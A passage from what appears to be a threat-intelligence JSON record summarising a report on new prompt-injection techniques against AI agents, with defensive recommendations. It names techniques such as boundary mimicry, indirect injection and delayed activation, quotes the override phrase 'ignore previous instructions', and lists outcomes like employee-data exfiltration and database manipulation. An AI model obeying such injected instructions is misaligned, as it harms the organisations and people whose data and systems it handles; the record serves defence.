mechanisms, data exfiltration from sensitive systems, and the execution of arbitrary commands or queries within the agent's environment. The examples demonstrate potential for sensitive employee data exfiltration, generation of dangerous instructions, and direct database manipulation, highlighting that these are critical threat vectors for organizations relying on AI agents.\n\n## Recommendation\n\n*   Implement robust AI threat modeling that encompasses all potential sources of model context, including prompts, files, RAG pipelines, agent memory, APIs, tool outputs, browser content, emails, and SaaS data, to identify and mitigate prompt injection risks.\n*   Expand AI red teaming exercises beyond basic \"ignore previous instructions\" scenarios to include advanced techniques like boundary mimicry, indirect injection, delayed activation, and uncommon substitutions, as described in CrowdStrike's new taxonomy.\n",
      "published": "2026-07-07T20:20:53Z",
      "labels": [
        "ai-security",
        "prompt-injection",
        "adversarial-ai",
        "agentic-ai",
        "techniques"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 60
    }
  ]
}